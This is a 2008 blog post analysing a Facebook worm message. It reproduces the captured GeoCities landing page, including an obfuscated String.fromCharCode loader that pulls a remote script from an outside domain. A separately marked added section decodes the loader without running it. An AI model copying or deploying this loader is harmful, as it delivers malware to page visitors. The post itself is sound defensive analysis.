Saturday, November 8, 2008

FaceBook Worm? Hack? or Worse?

Greetings from frigid Chicago!

For those of you who have accounts on these social networking sites, you know there is nothing more annoying than SPAM in your mailbox; or worse, some kind of nasty in there. Well, tonight I opened my FaceBook inbox and looked at a very strange-looking message from a friend. What struck me is that it wasn't someone that regularly sends me messages, much less links with cryptic and odd descriptions. Since this caught my attention, I decided to proceed further (using my VMWare sandbox, of course) and decided to document what I think may be a worm of some sort propagating. While I wouldn't normally jump to such a conclusion, I say this because I pinged my friend and asked him if he had sent the message and he had no idea what I was talking about.

Here's what I've been able to find so far.

1. First, let's look at the message itself (screen shot):


So I found this fascinating. First, it appears to be one of those "blanket messages" that would appear normal for most inboxes, except that the two of us generally don't send messages back and forth with cryptic subjects like that... much less such a cryptic body with a strange link.

2. Then I decided to fire up my VMWare sandbox and follow the link, for better or worse, from within FaceBook. This is what I found...

I was fascinated that FaceBook was able to determine (through their internal workings) that the site I was about to navigate to was malicious. Interesting! Of course, this wouldn't deter me.

3. Navigating to that malicious site, using FireFox with NoScript on, I got this little gem captured for your viewing pleasure... What's interesting is that the 76.x.x.x address there is my IP...


4. I then went and captured the landing page that gave me the above screen shot; the code from that page is here:
{script language="JavaScript"}var PUpage="76001548"; var PUprop="geocities"; {/script}{script language="JavaScript" src="http://www.geocities.com/js_source/pu5geo.js"}{/script}{script language="JavaScript"} var thGetOv="http://themis.geocities.yahoo.com/themis/h.php"; var thCanURL="http://us.geocities.com/adanbates84/index.htm"; var thSpaceId="76001548"; var thIP="76.243.224.30"; var thTs="1226206771"; var thCs="6903e27d9a64b4137d7d872f68c57349";{/script}{noscript}{link rel="stylesheet" href="http://themis.geocities.yahoo.com/jsoff.css?thIP=76.243.224.30&thTs=1226206771"}{/noscript}{script language="JavaScript" src="http://us.geocities.com/js_source/geovck08.js"}{/script}
{!-- text above generated by server. PLEASE REMOVE --}
{html}{head}{script}function handleError(){try{window.parent.location=location;}catch(e){}try{window.top.location=location;}catch(e){}}window.onerror=handleError;if(window.parent.frames.length}0){if(window.parent.document.body.innerHTML){}}{/script}{script}document.write(String.fromCharCode(96+60-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+62-96));{/script}{title}Angelina Jolie Fucking Cartoons{/title}{/head}{body}
{!-- following code added by server. PLEASE REMOVE --}
{link href="http://us.geocities.com/js_source/div.css" rel="stylesheet" type="text/css"}{script language="JavaScript" src="http://us.geocities.com/js_source/div03.js"}{/script}
{!-- preceding code added by server. PLEASE REMOVE --}This is video with you. You're doing something funny there.{/body}{/html}{!-- text below generated by server. PLEASE REMOVE --}{/object}{/layer}{/div}{/span}{/style}{/noscript}{/table}{/script}{/applet}{script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"}{/script}{script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/smb/js/hosting/cp/js_source/geov2_001.js"}{/script}{script language="javascript"}geovisit();{/script}{noscript}{img src="http://visit.geocities.yahoo.com/visit.gif?us1226206771" alt="setstats" border="0" width="1" height="1"}{/noscript}

{IMG SRC="http://geo.yahoo.com/serv?s=76001548&t=1226206771&f=us-w90" ALT=1 WIDTH=1 HEIGHT=1}
I highlighted in red the part that I found most interesting. I haven't converted that yet - but will shortly and post that as well. I think it's interesting, at very least.

Here is that string again, in case Blogger doesn't wrap properly.
{script}document.write(String.fromCharCode(
96+60-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+32-96,
96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+104-96,96+116-96,96+116-96,
96+112-96,96+58-96,96+47-96,96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,
96+97-96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+102-96,96+111-96,
96+47-96,96+106-96,96+115-96,96+47-96,96+106-96,96+115-96,96+46-96,96+106-96,
96+115-96,96+39-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114-96,
96+105-96,96+112-96,96+116-96,96+62-96));{/script}
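As an added example (not code from the original post), here is a small deobfuscator for the `document.write(String.fromCharCode(96+N-96, ...))` loader captured above. It evaluates each argument as plain integer arithmetic without `eval()`, so the hidden markup is returned for inspection rather than executed; the sample string is the loader as captured, with `<` and `>` restored.

```javascript
// Added example, not code from the original post: a small deobfuscator for the
// document.write(String.fromCharCode(96+N-96, ...)) loader captured above.
// Each argument is evaluated as plain integer arithmetic without eval(), so
// the decoded markup is returned for inspection, never executed.

// Constructed sample: the loader as captured on the page, with < and >
// restored (the post writes them as { and } so Blogger would not render them).
const SAMPLE = "<script>document.write(String.fromCharCode(96+60-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+62-96));</script>";

// Evaluate an expression made only of integers, '+' and '-', left to right.
function evalIntExpr(expr) {
  if (!/^\s*\d+(\s*[+-]\s*\d+)*\s*$/.test(expr)) {
    throw new Error("unsupported term: " + expr);
  }
  const tokens = expr.match(/\d+|[+-]/g);
  let value = parseInt(tokens[0], 10);
  for (let i = 1; i < tokens.length; i += 2) {
    const n = parseInt(tokens[i + 1], 10);
    value = tokens[i] === "+" ? value + n : value - n;
  }
  return value;
}

// Decode every String.fromCharCode(...) call found in a page's source.
function decodeFromCharCode(source) {
  const re = /String\.fromCharCode\(([^)]*)\)/g;
  const results = [];
  let match;
  while ((match = re.exec(source)) !== null) {
    const codes = match[1].split(",").map(evalIntExpr);
    results.push(String.fromCharCode(...codes));
  }
  return results;
}

// Pull src= URLs out of decoded markup so the second-stage script the loader
// fetches can be listed (and blocked or looked up) without fetching it.
function extractScriptSources(markup) {
  const out = [];
  const re = /<script[^>]*\ssrc\s*=\s*['"]([^'"]+)['"]/gi;
  let m;
  while ((m = re.exec(markup)) !== null) out.push(m[1]);
  return out;
}

const decoded = decodeFromCharCode(SAMPLE);
console.log(decoded);                               // decoded markup
console.log(decoded.flatMap(extractScriptSources)); // second-stage script URLs
```

On the captured string this yields `<script src='http://lostart.info/js/js.js'></script>`, so the loader on the GeoCities page is only a stub and the actual payload lives in that remote js.js, which the post does not capture.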


5. Within h.php I found something else that was interesting. Here that is:
{script language="JavaScript1.1" type="text/javascript"}

document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw0" onfocus="ss(\'go to phulki.com \',\'aw0\')" onmouseover="ss(\'go to phulki.com \',\'aw0\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw0" target="_top" href="http://npgeodb3.geo.scd.yahoo.com/*http://www.phulki.com" onfocus="ss(\'go to phulki.com \',\'aw0\')" onmouseover="return ss(\'go to phulki.com \',\'aw0\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}phulki.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Includes free web page, email & domain forwarding, 24-7 support." 
bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw1" onfocus="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseover="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw1" target="_top" href="http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=27176/*http://smallbusiness.yahoo.com/domains/" onfocus="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseover="return ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseout="cs()"}Great Value! Domain{br /}Names from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Includes free web page, email & domain forwarding, 24-7 support.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}domains.yahoo.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" 
bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw2" onfocus="ss(\'go to phulki.com \',\'aw2\')" onmouseover="ss(\'go to phulki.com \',\'aw2\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw2" target="_top" href="http://npgeodb3.geo.scd.yahoo.com/*http://www.phulki.com" onfocus="ss(\'go to phulki.com \',\'aw2\')" onmouseover="return ss(\'go to phulki.com \',\'aw2\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}phulki.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived." 
bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw3" onfocus="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseover="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw3" target="_top" href="http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=27190/*http://smallbusiness.yahoo.com/merchant?p=1" onfocus="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseover="return ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseout="cs()"}E-commerce Solutions{br /}from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}smallbusiness.yahoo.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');{/script}

So, while I'm doing some more analysis on this (feel free to contact me if you beat me to the punch, and I'll post it/credit you).

3 comments:

Anonymous said...

I saw this too and almost got nailed by it, but Firefox wouldn't let me go to it, so I went into my Linux VM and went to the link. It was some fake YouTube site that tried to download a setup.exe, 33 KB or so, that claimed to be a plugin to watch the movie. Will definitely be more cautious in the future.

Camille said...

I received a message from a Facebook friend about a video that I was in - clicked and it was flagged. It was an "off34-dot-com" link. How does one protect their profile from being hacked into to propagate this worm??

Rafal said...

@camille:
I'm not 100% sure how this happened to your account, so I can't quite tell you how to protect yourself. I *would* immediately change my password if I were you, and in the future be very careful what links you click, and why. Also, something to think about is using FireFox with the NoScript plugin... it's saved me from exploits while doing research more than once :-/

Good luck out there.
